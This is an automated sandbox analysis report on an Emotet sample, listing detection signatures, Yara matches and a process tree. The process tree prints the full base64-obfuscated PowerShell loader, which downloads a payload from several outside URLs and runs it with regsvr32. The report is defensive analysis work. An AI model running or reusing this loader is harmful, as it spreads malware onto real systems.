Edit tour
Windows
Analysis Report
Overview
General Information
| Analysis ID: | 631940 |
| Infos: |  |
 | |
Detection
Emotet
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
cmd.exe (PID: 6320 cmdline: cmd /C "po wershell.e xe -c "&{$ HXG=[Syste m.Text.Enc oding]::AS CII;$ghT=' ICBXcml0ZS 1Ib3N0ICJY aHFJVSI7JF Byb2dyZXNz UHJlZmVyZW 5jZT0iU2ls ZW50bHlDb2 50aW51ZSI7 JGxpbmtzPS giaHR0cDov L3d3dy5qc2 9uc2ludGwu Y29tL1J4c0 dnb1ZXejkv NEhGaTNaWl l0bllndEVM Z0NIblovIi wiaHR0cDov L2NtZW50YX J6LjV';$uf mV='2LnBsL 3RoZW1lcy9 6YWxNa1RiL yIsImh0dHB zOi8vbmFra GFyaW5pdHd lYmhvc3Rpb mcuY29tL0h TRFlLTjFYN UdMRi8iLCJ odHRwOi8vb mNpYS5kb3R ob21lLmNvL mtyL3dwLWl uY2x1ZGVzL 2x1N0pialg 4WEwxS2FEL yIsImh0dHA 6Ly9waWZmb C5jb20vcGl mZmwuY29tL 2EvIiwiaHR 0cDovL2RpZ 2l0YWxraXR jaGVuLmpwL 2ltYWdlcy9 QVm4vIik7J HQ9Ilp0TUl qWXgiOyRkP SIkZW52OlR NUFwuLlwkd CI7bWtkaXI gLWZvcmNlI CRkIHwgb3V 0LW51bGw7Z m9yZWFjaCA oJHUgaW4gJ GxpbmtzKSB 7dHJ5IHtJV 1IgJHUgLU9 1dEZpbGUgJ GRcSUtkemZ KdFFwai5CQ 1A7UmVnc3Z yMzIuZXhlI CIkZFxJS2R 6Zkp0UXBqL kJDUCI7YnJ lYWt9IGNhd GNoIHsgfX0 =';$AHI=[S ystem.Conv ert]::From Base64Stri ng($ghT+$u fmV);$Tcqk RL=$HXG.Ge tString($A HI); iex ( $TcqkRL)}" " MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 6364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 6408 cmdline: powershell .exe -c " &{$HXG=[Sy stem.Text. Encoding]: :ASCII;$gh T='ICBXcml 0ZS1Ib3N0I CJYaHFJVSI 7JFByb2dyZ XNzUHJlZmV yZW5jZT0iU 2lsZW50bHl Db250aW51Z SI7JGxpbmt zPSgiaHR0c DovL3d3dy5 qc29uc2lud GwuY29tL1J 4c0dnb1ZXe jkvNEhGaTN aWll0bllnd EVMZ0NIblo vIiwiaHR0c DovL2NtZW5 0YXJ6LjV'; $ufmV='2Ln BsL3RoZW1l cy96YWxNa1 RiLyIsImh0 dHBzOi8vbm FraGFyaW5p dHdlYmhvc3 RpbmcuY29t L0hTRFlLTj FYNUdMRi8i LCJodHRwOi 8vbmNpYS5k b3Rob21lLm NvLmtyL3dw LWluY2x1ZG VzL2x1N0pi alg4WEwxS2 FELyIsImh0 dHA6Ly9waW ZmbC5jb20v cGlmZmwuY2 9tL2EvIiwi aHR0cDovL2 RpZ2l0YWxr aXRjaGVuLm pwL2ltYWdl cy9QVm4vIi k7JHQ9Ilp0 TUlqWXgiOy RkPSIkZW52 OlRNUFwuLl wkdCI7bWtk aXIgLWZvcm NlICRkIHwg b3V0LW51bG w7Zm9yZWFj aCAoJHUgaW 4gJGxpbmtz KSB7dHJ5IH tJV1IgJHUg LU91dEZpbG UgJGRcSUtk emZKdFFwai 5CQ1A7UmVn c3ZyMzIuZX hlICIkZFxJ S2R6Zkp0UX BqLkJDUCI7 YnJlYWt9IG NhdGNoIHsg fX0=';$AHI =[System.C onvert]::F romBase64S tring($ghT +$ufmV);$T cqkRL=$HXG .GetString ($AHI); ie x ($TcqkRL )}" MD5: DBA3E6449E97D4E3DF64527EF7012A10) 
regsvr32.exe (PID: 6696 cmdline: "C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\.. \ZtMIjYx\I KdzfJtQpj. BCP MD5: 426E7499F6A7346F0410DEAD0805586B) - regsvr32.exe (PID: 6680 cmdline:
C:\Users\ user\AppDa ta\Local\T emp\..\ZtM IjYx\IKdzf JtQpj.BCP MD5: D78B75FC68247E8A63ACBA846182740E) - regsvr32.exe (PID: 3572 cmdline:
C:\Windows \system32\ regsvr32.e xe "C:\Win dows\syste m32\AHWppk eB\tZBUnLQ vw.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
- svchost.exe (PID: 6912 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6960 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 7008 cmdline:
c:\windows \system32\ svchost.ex e -k local service -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 7072 cmdline:
c:\windows \system32\ svchost.ex e -k netwo rkservice -p -s DoSv c MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 7140 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- SgrmBroker.exe (PID: 1128 cmdline:
C:\Windows \system32\ SgrmBroker .exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
- svchost.exe (PID: 5992 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA) 
MpCmdRun.exe (PID: 6032 cmdline: "C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: A267555174BFA53844371226F482B86B) - conhost.exe (PID: 5216 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- svchost.exe (PID: 1912 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6792 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5000 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6640 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6968 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5632 cmdline:
C:\Windows \system32\ svchost.ex e -k wusvc s -p -s Wa aSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | URL Reputation: | ||
| Source: | Avira URL Cloud: | ||
| Source: | URL Reputation: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | 17_2_00000001800248B0 | |
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | ASN Name: | ||
| Source: | ASN Name: | ||
| Source: | IP Address: | ||
| Source: | HTTP traffic detected: | ||